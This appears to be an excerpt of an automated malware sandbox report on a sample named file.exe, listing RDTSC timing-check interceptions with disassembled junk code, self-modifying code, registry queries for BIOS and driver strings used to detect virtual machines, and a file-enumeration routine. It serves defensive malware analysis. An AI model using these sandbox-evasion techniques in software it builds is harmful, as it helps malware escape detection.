                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135694A second address: 1356959 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F1548D0B2F6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1356959 second address: 135695D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1356D60 second address: 1356D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1356D64 second address: 1356D68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135F2C9 second address: 135F2D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F1548D0B2F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135F2D3 second address: 135F2FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15490E9B8Ch 0x00000007 jno 00007F15490E9B86h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F15490E9B91h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135EE48 second address: 135EE98 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F1548D0B306h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c js 00007F1548D0B32Dh 0x00000012 js 00007F1548D0B30Ch 0x00000018 jmp 00007F1548D0B306h 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F1548D0B2FFh 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136D887 second address: 136D88B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136D88B second address: 136D891 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136D891 second address: 136D897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136D897 second address: 136D8A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1548D0B2FBh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136D8A6 second address: 136D8CA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F15490E9B96h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F15490E9B86h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13703B0 second address: 13703B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137222A second address: 1372230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1372230 second address: 1372251 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1548D0B2F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1548D0B303h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1372251 second address: 1372255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1372255 second address: 137225D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137225D second address: 1372266 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1389813 second address: 1389819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1389819 second address: 138981F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138981F second address: 1389824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1389824 second address: 1389832 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13899CA second address: 13899CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1389AFA second address: 1389AFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1389AFE second address: 1389B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1389B04 second address: 1389B12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F15490E9B88h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1389B12 second address: 1389B32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1548D0B308h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1389B32 second address: 1389B36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1389F61 second address: 1389F65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1389F65 second address: 1389F74 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F15490E9B86h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138DC8A second address: 138DCAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1548D0B304h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F1548D0B2F6h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138DCAD second address: 138DCB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138D965 second address: 138D9A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1548D0B2FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007F1548D0B302h 0x0000000f push ebx 0x00000010 js 00007F1548D0B2F6h 0x00000016 pop ebx 0x00000017 popad 0x00000018 pushad 0x00000019 pushad 0x0000001a jmp 00007F1548D0B2FFh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138F371 second address: 138F377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138F377 second address: 138F386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F1548D0B2F6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138F386 second address: 138F38A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138F38A second address: 138F38E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138F38E second address: 138F394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138F394 second address: 138F3A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c ja 00007F1548D0B2F6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138F3A8 second address: 138F3AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 139F2AD second address: 139F2B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 139F2B2 second address: 139F2CC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 pop eax 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F15490E9B90h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 139F2CC second address: 139F2D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13ABA7E second address: 13ABA82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13ABA82 second address: 13ABAC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F1548D0B309h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F1548D0B2FAh 0x00000010 jbe 00007F1548D0B312h 0x00000016 jmp 00007F1548D0B306h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13AB519 second address: 13AB530 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15490E9B8Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13AB530 second address: 13AB534 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13AB534 second address: 13AB53E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F15490E9B86h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13AB53E second address: 13AB544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13AB544 second address: 13AB55F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15490E9B92h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13AB55F second address: 13AB56B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13AB56B second address: 13AB56F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13AB6DB second address: 13AB6F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1548D0B2FDh 0x00000007 jnp 00007F1548D0B2F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13AB6F2 second address: 13AB70D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F15490E9B97h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13AB70D second address: 13AB717 instructions: 0x00000000 rdtsc 0x00000002 js 00007F1548D0B2F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13AD430 second address: 13AD44F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007F15490E9B92h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13BD257 second address: 13BD267 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F1548D0B2FBh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13BD267 second address: 13BD285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push edi 0x00000009 jmp 00007F15490E9B8Eh 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13BD285 second address: 13BD289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13BD710 second address: 13BD72C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F15490E9B97h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13BD72C second address: 13BD743 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1548D0B301h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13BD743 second address: 13BD754 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F15490E9B86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13BD754 second address: 13BD75A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13BD75A second address: 13BD78B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15490E9B94h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F15490E9B94h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13BD78B second address: 13BD7A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1548D0B306h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13BDBAF second address: 13BDBC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jc 00007F15490E9BCCh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13BDBC2 second address: 13BDBC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13BDD5C second address: 13BDD63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C0D69 second address: 13C0D6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C0D6D second address: 13C0D77 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F15490E9B86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C0D77 second address: 13C0E30 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1548D0B303h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F1548D0B2F8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 sub dword ptr [ebp+122D2896h], ecx 0x0000002d push 00000004h 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 call 00007F1548D0B2F8h 0x00000037 pop ebx 0x00000038 mov dword ptr [esp+04h], ebx 0x0000003c add dword ptr [esp+04h], 00000018h 0x00000044 inc ebx 0x00000045 push ebx 0x00000046 ret 0x00000047 pop ebx 0x00000048 ret 0x00000049 mov dword ptr [ebp+122D2325h], esi 0x0000004f call 00007F1548D0B2F9h 0x00000054 jmp 00007F1548D0B2FAh 0x00000059 push eax 0x0000005a jmp 00007F1548D0B2FEh 0x0000005f mov eax, dword ptr [esp+04h] 0x00000063 pushad 0x00000064 pushad 0x00000065 push edx 0x00000066 pop edx 0x00000067 jmp 00007F1548D0B2FEh 0x0000006c popad 0x0000006d jnp 00007F1548D0B2FCh 0x00000073 popad 0x00000074 mov eax, dword ptr [eax] 0x00000076 pushad 0x00000077 push eax 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C1046 second address: 13C104C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C104C second address: 13C1050 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C1050 second address: 13C108C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov dword ptr [ebp+122D36CBh], ecx 0x0000000f push dword ptr [ebp+122D2D2Bh] 0x00000015 stc 0x00000016 call 00007F15490E9B89h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F15490E9B99h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C108C second address: 13C109E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1548D0B2FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C109E second address: 13C10A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C10A4 second address: 13C10A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C10A8 second address: 13C10EA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F15490E9B86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f jmp 00007F15490E9B99h 0x00000014 pop edx 0x00000015 pop edx 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a pushad 0x0000001b jmp 00007F15490E9B90h 0x00000020 push ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C5E8A second address: 13C5EAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 js 00007F1548D0B30Dh 0x0000000b jmp 00007F1548D0B307h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 57E0335 second address: 57E0339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 57E0339 second address: 57E033F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 57E033F second address: 57E0345 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 57E0345 second address: 57E0369 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007F1548D0B2FAh 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F1548D0B2FAh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 57E0369 second address: 57E036D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 57E036D second address: 57E0373 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 57E0373 second address: 57E039E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15490E9B8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F15490E9B90h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 57E039E second address: 57E03BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1548D0B309h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 57E03F3 second address: 57E0474 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15490E9B99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F15490E9B8Ch 0x00000011 and ecx, 254EC378h 0x00000017 jmp 00007F15490E9B8Bh 0x0000001c popfd 0x0000001d movzx ecx, dx 0x00000020 popad 0x00000021 push eax 0x00000022 jmp 00007F15490E9B92h 0x00000027 xchg eax, ebp 0x00000028 jmp 00007F15490E9B90h 0x0000002d mov ebp, esp 0x0000002f jmp 00007F15490E9B90h 0x00000034 pop ebp 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 pushad 0x00000039 popad 0x0000003a mov bh, 0Dh 0x0000003c popad 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 57E0474 second address: 57E047A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12DE26B second address: 12DE270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12DE270 second address: 12DE27A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F1548D0B2F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 1121B9F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 12CE6D1 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 1360A79 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_00ED38B0
